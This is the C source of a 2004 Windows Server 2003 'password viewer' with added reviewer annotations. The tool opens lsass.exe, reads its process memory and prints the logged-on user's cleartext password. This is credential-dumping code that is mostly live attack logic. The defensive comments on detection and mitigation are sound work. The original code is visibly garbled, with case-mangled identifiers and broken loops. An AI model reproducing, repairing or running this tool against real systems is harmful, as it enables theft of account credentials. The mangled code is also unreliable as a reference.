// ******************************************************** ***************************************** // Version: v1.0 // CODER: Wineggdrop // Release Date: 12/15/2004 // Purpose: To demonstrate searching for the logged-on user's password on a Windows 2003 box. The method // used is rather unwise, but it may be the only way to view the // logged-on user's password on Windows 2003. // Test Platform: Windows 2003 // Compiled on: VC 6.0 // ********************************************** ******************************** #include
// Hard-coded virtual address inside lsass.exe from which Findpassword() reads a
// 5 KB window. The author's own note says the result is unreliable: the secret
// may sit before this address or far beyond the window. Build-specific constants
// like this are why such tools break across patch levels; for a defender the
// durable signal is the cross-process read of lsass itself, not this address.
#define baseaddress 0x002b5000 // The base memory address to search; the password may be located before the address or far more from this address, Which Causes the result unreliable
// Global buffer that search() zeroes (ZeroMemory) and, per the header comment,
// fills with the bytes following the marker string; Findpassword() then prints
// it with printf. It is never cleared before the process exits, so the secret
// stays in this process's memory and on stdout / in any captured console log.
Char password [MAX_PATH] = {0}; // Store The Found Password
// NOTE(review): identifier casing is inconsistent throughout this listing
// (Bool/BOOL, getlsasspid/GETLSASSPID/getlsassspid, int/INT, Printf/printf) and
// `uint` is not a type defined by standard C (presumably a lowercased UINT). The
// text reads as a case-mangled transcription of the source, not compilable code.
// Function prototype declaration // ------------------------------------------- -------------------------------------------------- --------- Bool Findpassword (DWORD PID); int search (char * buffer, const uint nsize); dWord getlsasspid (); BOOL IS2003 (); // ---------- -------------------------------------------------- ------------------------------------------ // end of function prototype declaration
// Entry point. Prints a banner, refuses to run unless IS2003() reports a 5.2
// kernel, resolves the lsass.exe pid via the Toolhelp snapshot helper and hands
// it to Findpassword(). Returns -1 when either precondition fails, 0 otherwise;
// Findpassword()'s own BOOL result is not checked. In the collapsed lines below
// each trailing `//` comment ran to end-of-line in the original, and the brace
// block that followed it on the next line has been folded onto the same line.
INT main () {dWord PID = 0; Printf ("Windows 2003 Password Viewer V1.0 By WineggDrop / N / N");
IF (! IS2003 ()) // Check Out if The Box IS 2003 {Printf ("The Program CAN't Only Run On Windows 2003 Platform / N"); Return -1;}
// NOTE(review): spelled getlsassspid here, getlsasspid in the prototype and
// GETLSASSPID at the definition - three different identifiers for one function.
PID = getlsassspid (); // get the lsass.exe pid
IF (PID == 0) // Fail to Get Pid if Returning Zerom {Return -1;}
Findpassword (PID); // Find the password from lsass.exe memory return 0;} // end main ()
// Four helpers follow, collapsed onto three physical lines. The search()
// scan/copy loops and the tail of FindPassword() are garbled in this
// transcription, so the notes below state only what the visible calls show.
//
// search(buffer, nsize): returns -1 for a NULL buffer; otherwise looks for
// "procedure" followed (strlen("procedure")+1 bytes later) by "Call" using
// strnicmp, zeroes the global `password` and - per the header comment; the loop
// itself is garbled - copies what follows into it. The int it returns is the
// offset FindPassword() reports relative to baseaddress (presumably
// `found + baseaddress`). The author's header is explicit that locating the
// marker is luck, not a contract.
//
// GETLSASSPID(): CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS) plus
// Process32First/Process32Next, strcmpi on szExeFile against "lsass.exe";
// returns th32ProcessID, or 0 when the snapshot or first entry fails. The
// snapshot handle is closed on both the early-return and the normal path.
//
// FindPassword(pid): OpenProcess(PROCESS_VM_READ, FALSE, pid) on lsass,
// ReadProcessMemory of 5*1024 bytes at baseaddress into a 5 KB stack buffer,
// CloseHandle, then search() over the bytes actually read (Byteget) and a
// cleartext printf of the result. This is the classic "read LSASS memory"
// credential-access pattern (MITRE ATT&CK T1003.001). For defenders: a
// non-system process obtaining a PROCESS_VM_READ handle to lsass.exe is the
// high-signal event (e.g. Sysmon Event ID 10 ProcessAccess with TargetImage
// lsass.exe). On supported Windows versions LSA Protection (RunAsPPL) and
// Credential Guard raise the bar against exactly this read; neither exists on
// the end-of-life 2003 target this tool is gated to.
//
// IS2003(): GetVersionEx with an OSVERSIONINFOEX, falling back to a plain
// OSVERSIONINFO, then returns dwMajorVersion == 5 && dwMinorVersion == 2.
// NOTE(review): 5.2 is also reported by Windows XP x64 Edition, so this is a
// kernel-version gate rather than a strict "Server 2003" check.
/ / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: Search The Memory & Try to Get The Password / / RETURN TYPE: INT // Parameters: // in: Char * Buffer -> The Memory Buffer To search // Out: const uint nsize -> The size of the memory buffer // Note: The Program Tries To Locate T Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location, But It's Not Always True That // We Will Find The Magic String, Or Even We Find It, The Password May Be Located // At Some Other Place.WE Only Look for luck // ----------------------------------------- ----------------------------------------- Int search (char * buffer, Const uint nsize) {uint offset = 0; uint i = 0; uint j = 0; uint count = 0; if (buffer == null) {return -1;} for (i = 0; i IF (& Buffer [i offset], "procedure", strlen ("procedure")) == 0) {OFFSET = Strlen ("procedure") 1; IF (Strnicmp (& Buffer [i offset], "Call", Strlen ("Call") == 0) {i = Offset; Break;}}}}}}}}}}}}}}}}} {zeromeMEMEMORY (Password, Sizeof (Password)); for (; i / / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: to get the lsass.exe pid // return TYPE: DWORD // Parameters: None // ---------------------------------------- ------------------------------------------ DWORD GETLSASSPID () {Handle hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) {printf ( "Fail To Create Snap Shot / n"); return 0;} PE32.dwsize = sizeof (ProcesSsentry32); IF (! ProcessSnap, & PE32) {CloseHandle (HProcessSnap); // Must Clean Up The Snapshot Object! 
Return 0;} DO {IF (strcmpi (pe32.szexefile, "lsass.exe") == 0) {pid = pe32.th32processid; break;}} while (Process32Next (HProcessSnap, & PE32)); CloseHandle (HProcessSnap); Return PID;} // end getlsasspid () / / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: to find the password // Return Type: Boolean // Parameters: // in: DWORD PID -> The lsass.exe's pid // ------------------------------- -------------------------------------------------- --- Bool FindPassword (DWORD PID) {Handle HProcess = NULL; Char Buffer [5 * 1024] = {0}; DWORD BYTEGET = 0; int found = -1; HProcess = OpenProcess (Process_VM_READ, FALSE, PID); // Open process if (hprocess == null) {Printf ("Fail to open process / n"); return false;} IF (! ReadProcessMemory (HProcess, (Pvoid) Baseaddress, Buffer, 5 * 1024, & Byteget) // read the memory from lsass.exe {printf ("Fail to Read Memory / N"); CloseHandle (HProcess); Return False CloseHandle (HProcess); Found = Search (Buffer, Byteget); // Search the password if (Found> = 0) // We May Find the password {ix (strlen (password> 0) // Yes, WE Find The Password Even We don't know et {printf ("Found Password AT # 0x% x -> /"% s / "/ n", found baseaddress, password;}} else { Printf ("Fail to Find The Password / N");} Return True;} // end Findpassword / / -------------------------------------------------------------------------------------------- ------------------------------------ // Purpose: Check if the box is windows 2003 // Return TYPE: Boolean // Parameters: none // ---------------------------------------- ------------------------------------------ BOOL IS2003 () {osversioninfoex Osvi; Bool B0SVersionInfoEx; ZeromeMory (osversioninfoex); Osvi.dwosveionInfosize = Sizeof (OsversionInfoEx); if {osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);} ((b0sVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) & osvi))!) 
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);} // End Is2003 ( ) // end of file